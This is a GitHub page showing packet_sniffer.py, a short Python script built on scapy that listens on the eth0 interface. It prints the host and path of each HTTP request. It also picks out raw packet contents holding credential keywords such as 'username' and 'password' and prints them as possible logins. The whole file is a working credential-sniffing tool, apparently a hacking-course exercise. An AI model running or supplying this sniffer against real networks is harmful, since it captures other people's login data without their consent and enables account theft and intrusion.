-
Notifications
You must be signed in to change notification settings - Fork 0
/
packet_sniffer.py
34 lines (22 loc) · 891 Bytes
/
packet_sniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = str(packet[scapy.Raw].load)
keywords = ["username", "uname", "user", "login", "password", "pass", "pd", "secret"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP REQUEST: " + url.decode())
login_info = get_login_info(packet)
if login_info:
print("\n\n[+]Possible username/password: " + login_info + "\n\n")
sniff("eth0")